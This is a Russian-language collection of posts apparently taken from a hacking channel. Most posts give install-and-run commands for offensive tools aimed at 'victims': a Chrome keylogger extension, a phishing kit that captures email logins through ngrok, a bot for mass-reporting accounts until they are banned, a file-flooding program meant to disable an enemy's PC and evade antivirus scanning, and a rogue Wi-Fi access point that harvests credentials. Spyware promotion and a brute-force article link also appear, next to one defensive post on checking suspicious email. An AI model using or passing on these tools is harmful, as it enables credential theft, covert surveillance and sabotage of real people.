Сборник программ
для рассылок📟

Ninja Pinner - Pinterest
NinjaGram - Instagram
NinjaTok - TikTok
TumbleNinja - Tumblr
Сохраняй и не теряй😉
Злой Мамонт🐘

​💥 Создаем вредоносный плагин-кейлоггер для Google Chrome!

Hera – это утилита, позволяющая создать кейлогер, работающий как расширение в браузере Google Chrome.

Установка на Linux:
$ git clone https://github.com/UndeadSec/HeraKeylogger
$ cd HeraKeylogger
$ sudo apt-get install python3-pip -y
$ sudo pip3 install -r requirements.txt

Запуск:
$ python3 hera.py

Расширение будет создано и сохранено в папке «MaliciousExtension». Оно должно быть установлено вручную в браузере «жертвы». После установки, все нажатия клавиш и посещенные веб-сайты будут храниться в вашем файле log.txt.

Black Hat - Только лучшее!

​Как защититься от заражения через email?

Приветствую друзья!
Рассылка спама с вредоносными вложениями — довольно популярный способ распространения малвари и заражения компьютеров пользователей в интернете. По данным разных антивирусных компаний, доля писем с вредоносными вложениями составляет от 3 до 5 процентов от общего объема спам-трафика, то есть как минимум каждое тридцатое письмо в потоке спам-рассылок несет в себе вредоносный сюрприз.

Зачастую, вредоносное письмо можно распознать даже по названию. Но бывает, что вирусное письмо очень хорошо замаскировано и нуждается в подробном анализе. Чтобы бы проверить входящую почту и ее вложения можно воспользоваться сервисами ниже, которые собрал Игорь Бедеров |владелец компании Интернет-Розыск|.

1. Верифицируем адрес отправителя email:
└ https://centralops.net/co/emaildossier.aspx
└ https://2ip.ru/mail-checker/
└ http://ru.smart-ip.net/check-email/
└ https://ivit.pro/services/email-valid/
└ https://www.xverify.com/
└ https://mailvalidator.ru/
└ https://www.zerobounce.net/
└ https://www.emailmarker.com/
└ https://quickemailverification.com/
└ https://emailrep.io/

2. Удостоверяемся в соответствии доменного имени отправителя email:
└ https://2ip.ru/whois/
└ http://www.ripn.su/nic/whois/
└ https://whoer.net/ru/checkwhois
└ http://www.securrity.ru/whoiz.html

3. Оцениваем безопасность гиперссылок в email:
└ https://scanurl.net/
└ https://longurl.info/
└ https://vms.drweb.ru/online/
└ https://virusdesk.kaspersky.ru/
└ https://opentip.kaspersky.com/

4. Анализируем вложенные файлы в "песочницах":
└ https://cuckoo.cert.ee/
└ https://www.hybrid-analysis.com/
└ https://malwr.com/
└ https://any.run/

Установка и настройка Tails

Данный гайд будет полезен для тех, кто в первые решил ознакомиться с данной системой. TAILS - это Live USB дистрибутив, который выгружается в оперативную память, и не оставляет за собой никаких следов. Это обычная флэшка, которую ты сможешь вставить в любой комп, сделать все свои темные делишки и не оставить ни каких следов.

Читать статью l Зеркало

​Взлом электронной почты с помощью Love-Dose!

Нашли еще один мощный инструмент, который работает на основе фишинговых атак. Последняя полностью необнаружимая веб-страница фишинга электронной почты. Так что, не теряя больше времени, давайте начнем.

Требования:
Установленный Ngrok

Вы можете установить эти пакеты непосредственно с помощью apt manager, и как только вы успешно установите их, следуйте заданным командам или шагам.

$ apt install php
$ git clone https://github.com/kinghacker0/Love-Dose
$ cd Love-Dose
$ bash love-dose.sh

Теперь включите точку доступа вашего устройства, перейдите к ngrok и подождите, пока он не сгенерирует для вас фишинговую ссылку.

Как только жертва нажимает на эту ссылку, вы получаете ее IP-адрес, и когда он/она вводит идентификатор и пароль, он появится в вашей консоли.

🛍 ARENA SHOP

👾 007Spam-BOT – инструмент, позволяющий автоматически отправлять множество жалоб на чужие аккаунты, с целью их заблокировать.

▫️Установка на Linux:

$ git clone https://github.com/mrwn007/007spam-BOT.git
$ cd 007spam-BOT
$ pip install requests
$ python bot.py

▫️Установка в Termux:

$ git clone https://github.com/mrwn007/007spam-BOT.git
$ cd 007spam-BOT
$ python3 -m pip install requests
$ python3 bot.py

​​Удаленно сделать фото, записать звук, отследить позицию, прослушать звонки, просмотреть фотографии, посещения сайтов и многое другое!

​​Удаленно сделать фото, записать звук, отследить позицию, прослушать звонки, просмотреть фотографии, посещения сайтов и многое другое!

Sherlock - утилита, которая пробивает человека по нику во многих популярных социальных сетях и сайтах.

В их число входят такие проекты как Facebook, Twitter, Twitch, TikTok, Telegram, Steam, GitHub, HackerNews и многие другие популярные сайты. В общей сложности sherlock пробивает имя в более чем 90 социальных сетях и сайтах, что позволит намного быстрее найти нужного нам человека.

Читать

​​Python+requests+threading. Перебор пароля в формах авторизации.

Приветствую всех специалистов и заинтересованных Информационной Безопасностью на этом замечательном ресурсе. Продолжаю свой цикл статей по изучению языков программирования. С публикации моей последней статьи прошло много времени и в обсуждении к ней я пообещал написать новый скрипт/программу, которая бы: 1. Использовала бы замечательный модуль requests; 2. Использовала бы многопоточность через модуль threading; 3. Забирала бы пароли из готовой базы данных; 4. При новом POST-запросе к форме авторизации меняла бы «случайно» заголовки. Сразу прошу прощения за столь долгое отсутствие на форуме, но задачу я выполнил, а Вам ее оценивать. Ну что начнем?!

Читать: https://codeby.net/threads/python-requests-threading-perebor-parolja-v-formax-avtorizacii.62698/

#python #auth #bruteforce

​Отправка аудиофайлов под видом голосовых сообщений

Способ подходит для Телеграма, ВКонтакте, WhatsApp, Viber

Инструкция:

1. Скачиваем приложение - КЛИК
2. Заходим, нажимаем "Мои наборы"
3. В правом верхнем углу нажимаем на плюсик
4. Пишем название вашего набора
5. Заходим в набор и нажимаем на плюсик в правом верхнем углу
6. Нажимаем на добавить файл и переходите в папку где лежат аудиофайл, который мы хотим отправить
7. Пишем название вашего голосового стикера (назвать можете как вам удобно), и нажимаем добавить.
8. Нажимаем на добавленный пак и выбираем способ отправки.
9. Выбираем нужный чат и отправляем.

Memory Stresser - убей ПК своего недруга!

Создает сотни тысяч файлов на компе жертвы по 1 кб . Залил в архив с паролем, чтобы бот VT не отсканил и не добавил детектов.  Написана на c++, так что скорость не обидит!

Пароль от архива: 123123

SRBMiner-MULTI Miner v0.7.3

Это майнер с закрытым исходным кодом, доступный для Linux и Windows, поддерживающий алгоритмы майнинга CPU, а также некоторые AMD GPU.

​​Взлом через точку доступа.

Зачастую люди попросту не хотят заботиться о безопасности своих данных, и подключаясь к "Халявному" Wi-Fi, мы этим и воспользуемся.

Устанавка:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
sudo ./installer.sh --install

Запуск:

wifi-pumpkin

Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy".